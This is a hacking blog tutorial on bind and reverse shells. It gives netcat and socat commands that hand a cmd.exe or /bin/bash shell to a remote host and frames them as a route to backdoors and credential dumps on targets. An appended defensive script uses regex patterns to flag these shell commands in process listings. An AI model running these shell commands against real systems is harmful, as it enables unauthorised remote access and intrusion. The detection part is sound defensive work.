Ultimate Guide to Reverse and Bind Shells: Mastering Netcat and Socat for Maximum Security

Hey Hackers!!

I often find myself in a situation where I have only the limited tools already installed on a target machine as I pwn it; at other times I can only transfer small files to expand my foothold on the target. For these reasons it is important for me to have a good understanding of the tools I use. Some of the tools I use often are Netcat, socat, Wireshark, and the list goes on.

In such circumstances I make use of my Swiss army knife, which lets me transfer files and gain shell access to the target machine. With a shell I can easily embed backdoors for a persistent connection, dump database files, dump credentials, and the possibilities are endless.

Today we are going to discuss the two major types of shells.

  1. Bind Shell
  2. Reverse Shell

Let's get into the crux of it.

Bind Shells

A Bind Shell is used in a scenario where the target machine has fewer restrictions on outbound connections. Let's take an example where Bob (Windows) has asked Alice (Linux) to connect to his computer and issue some commands. Bob has a public IP and is connected to the internet; Alice, on the other hand, is behind NAT and has a private IP. To complete the scenario, Bob needs to bind a TCP port on his public IP address and ask Alice to connect to it.

To simplify, Bob will check his IP and run Netcat with the "-e" switch so that it executes cmd.exe as soon as a connection is made to the listening port.

ncat -nlvp 3131 -e cmd.exe


Now netcat is listening on port 3131 on Bob's IP, i.e. 192.168.2.24, and will execute cmd.exe as soon as Alice connects to it, giving her a command shell.

Alice will now try to connect to Bob's computer using netcat with the following command.

sudo nc -nv 192.168.2.24 3131

Reverse Shells

A Reverse Shell is used to bypass a firewall or other network restrictions. Let's say now Alice wants Bob to execute a command, but she has no control over the router on her premises and therefore cannot forward traffic from the router to her internal machine.

We can use netcat to send a command shell to a host listening on a specific port. In this situation Alice cannot bind a port to /bin/bash and expect Bob to connect to it, but she can send control of her command prompt to Bob's machine instead; this is what we call a Reverse Shell.

Now Bob will listen on port 3131 on his Windows machine.

ncat -nlvp 3131

Alice, on connecting to Bob, will send her shell.

nc -nv 192.168.2.24 3131 -e /bin/bash

This should give Bob shell access to Alice's machine.

Socat

Socat is another great utility that you can use to get Reverse & Bind Shells; the working remains the same but the syntax changes. It also comes with a fork option which allows multiple connections.

Let's take a look at a Socat Reverse Shell.

.\socat.exe TCP4-LISTEN:3131 STDOUT

I'll start the listener on port 3131 on the Windows machine.

On the Linux machine:

sudo socat TCP4:192.168.2.24:3131 EXEC:/bin/bash

Now let's check whether it worked.

Knowing the difference between a Reverse Shell and a Bind Shell has always been a struggle for newbies. It is important to take some time and try getting both shells with and without firewalls; I think only then can we use these excellent tools to their full potential.
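To make that difference concrete from the defender's side, here is an added example (my own script, not part of the original post) that classifies process command lines, such as the output of `ps -eo args=`, as bind-shell or reverse-shell patterns built from the netcat and socat commands shown above. It flags only the side that actually hands out a shell (netcat with -e/-c, socat with an EXEC:/SYSTEM: address); the sample listing is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: classify process command lines
# into the two shell types described above. Only the side that hands out a
# shell is flagged: netcat with -e/-c/--exec, or socat with EXEC:/SYSTEM:.
# A plain listener or plain client such as `nc -nv host port` reports "none".

NC_BIN='(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]'
NC_EXEC='[[:space:]](-e|-c|--exec|--sh-exec)([[:space:]]|$)'
NC_LISTEN='[[:space:]](-[a-zA-Z]*l[a-zA-Z]*|--listen)([[:space:]]|$)'
SOCAT_EXEC='socat.*(EXEC|exec|SYSTEM|system):'
SOCAT_LISTEN='socat.*-(LISTEN|listen|L|l):'

matches() { printf '%s\n' "$1" | grep -Eq "$2"; }

# classify_cmdline "<command line>" prints bind-shell, reverse-shell or none.
classify_cmdline() {
    cmd=$1
    if matches "$cmd" "$NC_BIN" && matches "$cmd" "$NC_EXEC"; then
        # netcat hands its socket to a program: listening => bind, connecting => reverse
        if matches "$cmd" "$NC_LISTEN"; then echo bind-shell; else echo reverse-shell; fi
    elif matches "$cmd" "$SOCAT_EXEC"; then
        if matches "$cmd" "$SOCAT_LISTEN"; then echo bind-shell; else echo reverse-shell; fi
    else
        echo none
    fi
}

# triage_listing reads one command line per stdin line and prints
# "<class><TAB><command line>" for every line that is not "none".
triage_listing() {
    while IFS= read -r line; do
        kind=$(classify_cmdline "$line")
        [ "$kind" = none ] || printf '%s\t%s\n' "$kind" "$line"
    done
}

# Constructed sample listing: the post's commands plus benign lines.
SAMPLE_PS='ncat -nlvp 3131 -e cmd.exe
nc -nv 192.168.2.24 3131
socat TCP4-LISTEN:3131 STDOUT
socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
socat TCP4:192.168.2.24:3131 EXEC:/bin/bash
nc -nv 192.168.2.24 3131 -e /bin/bash
sshd: user [priv]'

# count_flagged returns how many sample lines were classified as a shell.
count_flagged() { printf '%s\n' "$SAMPLE_PS" | triage_listing | wc -l | tr -d ' '; }

printf '%s\n' "$SAMPLE_PS" | triage_listing
```

Run it against a real `ps -eo args=` listing by piping that output into triage_listing; Bob's plain listener and Alice's plain client in the bind-shell section both come out as "none", since neither exposes a shell by itself.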

Happy Hacking !!!
